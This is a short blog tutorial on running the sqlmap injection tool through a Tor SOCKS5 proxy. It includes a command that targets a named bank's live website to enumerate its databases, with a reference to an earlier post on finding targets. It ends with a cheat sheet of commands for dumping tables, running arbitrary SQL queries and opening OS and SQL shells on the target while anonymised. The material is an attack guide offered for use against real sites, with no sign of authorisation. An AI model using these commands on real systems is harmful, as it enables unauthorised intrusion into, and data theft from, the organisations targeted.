Skip to main content

SQLMAP - Using TOR proxy

Using SQLMAP with TOR

OS: Windows 10
Compiler : Python 3.x
Script : SQLMAP
Proxy: TOR

STEP 1:

Download and install TOR 


STEP 2:

Install TOR and Start TOR services
After installing Tor, a new folder of Tor will be created (Desktop in my case)
Navigate to the following location and start tor.exe

Desktop\Tor Browser\Browser\TorBrowser\Tor


STEP 3: Follow my previous post on SQLMAP to find a target

Navigate to the SQLMAP folder in power shell.
Execute the following commands-

python .\sqlmap.py --tor --tor-type=SOCKS5 -u "https://www.fcibank.com.pk/index.php?route=common/page&pageid=%7B021A9F2C-951C-B9F7-D1B6-805BA07752DB%7D" --dbs


STEP 4:
Follow the same steps as in my previous post on SQLMAP to find Database names, Table names and dump the Tables. Just add the following option in it:

.\sqlmap.py --tor --tor-type=SOCKS5

SQLMAP OPTIONS

# Enumerate databases
sqlmap --dbms=mysql -u "$URL" --dbs


# Enumerate tables
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --tables


# Dump table data
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" -T "$TABLE" --dump


# Specify parameter to exploit
sqlmap --dbms=mysql -u "http://www.example.com/param1=value1&param2=value2" --dbs -p param2


# Specify parameter to exploit in 'nice' URIs
sqlmap --dbms=mysql -u "http://www.example.com/param1/value1*/param2/value2" --dbs # exploits param1


# Get OS shell
sqlmap --dbms=mysql -u "$URL" --os-shell


# Get SQL shell
sqlmap --dbms=mysql -u "$URL" --sql-shell


# SQL query
sqlmap --dbms=mysql -u "$URL" -D "$DATABASE" --sql-query "SELECT * FROM $TABLE;"


# Use Tor Socks5 proxy
sqlmap --tor --tor-type=SOCKS5 --check-tor --dbms=mysql -u "$URL" --dbs

Labels:

Comments

Post a Comment